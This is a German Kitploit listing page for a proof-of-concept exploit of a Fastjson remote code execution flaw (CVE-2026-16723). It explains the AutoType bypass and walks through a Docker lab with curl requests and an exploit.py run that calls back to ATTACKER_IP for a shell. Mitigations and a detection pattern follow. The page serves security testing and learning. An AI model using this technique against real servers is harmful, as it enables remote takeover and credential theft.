Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/eqstlab/cve-2026-16723
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungRed TeamingPayload-Entwicklung
GitHubeqstlab/cve-2026-16723

CVE-2026-16723

PoC-Exploit für Fastjson RCE (CVE-2026-16723) mit automatisierter Erzeugung und Auslieferung von JAR-Payloads über manipuliertes JSON unter Umgehung der AutoType-Einschränkungen.

Repository anzeigen
1vor 21 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-16723 Fastjson RCE

★ CVE-2026-16723 Fastjson @JSONType RCE PoC ★


Übersicht

CVE-2026-16723 ist eine Remote-Code-Execution-Schwachstelle (RCE) in Fastjson 1.x (1.2.68 – 1.2.83). Wenn Fastjson angreiferkontrolliertes JSON parst, wird ein präparierter @type-Wert in eine Klassenressourcen-Suche innerhalb von checkAutoType umgewandelt. In einem ausführbaren Spring-Boot-Fat-JAR löst der Klassenlader diesen Namen als jar:http://-URL auf und ruft ein entferntes JAR ab (SSRF), lädt dann eine Klasse mit der @JSONType-Annotation, obwohl AutoType deaktiviert ist. Da ein modernes JDK / Tomcat den binären Namen jar:http:// ablehnt, legt die zuverlässige Variante das JAR in den JVM-Cache ab und liest es über jar:file:/proc/self/fd/N erneut ein, sodass die Klasse definiert wird und ihr statischer Initialisierer ausgeführt wird, was Codeausführung ermöglicht. AutoType bleibt deaktiviert und kein Classpath-Gadget ist erforderlich.


Betroffene Versionen

KategorieVersion
VerwundbarFastjson 1.2.68 ≤ Version ≤ 1.2.83
BehobenMigration zu Fastjson 2.x (keine behobene 1.x-Version)

Auswirkungen

  • Remote Code Execution mit dem Dienstkonto
  • Offenlegung von Secrets/Zugangsdaten von Host und Umgebung
  • Vollständige Kompromittierung der betroffenen Anwendung

Umgebung

Das Laborziel ist ein öffentlicher Onlineshop (Northwind Store), dessen Such-API den Request-Body mit Fastjson bindet. Alles entspricht den Standardeinstellungen von Fastjson: SafeMode aus, AutoType aus, verpackt als Spring-Boot-Fat-JAR.

root@kitploit:~
docker build -t cve-2026-16723 .
docker run -d --name cve-2026-16723 -p 8080:8080 cve-2026-16723
VoraussetzungZustand in diesem Labor
Fastjson 1.2.68 – 1.2.831.2.83
Ausführbares Spring-Boot-Fat-JARja
Nicht authentifizierter JSON-Parse-PfadPOST /api/products/search
SafeMode / AutoTypeStandard (beide aus)

PoC

Angreifer und Ziel laufen im selben Docker-Bridge-Netzwerk, sodass das Ziel den Angreifer als ausgehende Verbindung erreicht (es wird kein zusätzlicher Port veröffentlicht).

Schritt 1. Bestätigen, dass das Ziel läuft

root@kitploit:~
curl http://TARGET_IP:8080/api/health
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' -d '{"keyword":"keyboard"}'

Schritt 2. Den Exploit auf dem Angreifer-Rechner ausführen

exploit.py erstellt das Payload-JAR, stellt es bereit, startet einen Listener und gibt den Request-Body aus. Nur die Callback-Adresse ist erforderlich.

root@kitploit:~
python3 attacker/exploit.py --lhost ATTACKER_IP --lport 4444

Schritt 3. Den Payload zustellen

Fügen Sie den ausgegebenen Body in den Such-Endpunkt ein (Burp Repeater oder curl) und senden Sie ihn ab. Die Suchanfrage ist eine normale Funktion; nur ihr JSON-Body ist präpariert.

root@kitploit:~
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' --data-binary @body.json

Schritt 4. Das Ergebnis bestätigen

Der Code läuft mit dem Dienstkonto. Rufen Sie die Flag über die erhaltene Shell ab:

root@kitploit:~
whoami

Gegenmaßnahmen

  • Auf Fastjson 2.x migrieren
  • Oder com.alibaba:fastjson:1.2.83_noneautotype ausführen
  • Oder die JVM mit -Dfastjson.parser.safeMode=true starten
  • Erkennung: JSON-@type-Werte, die jar:http- oder jar:file-//proc/self/fd-Muster enthalten

Analyse

  • KR:
  • EN:
Tool herunterladen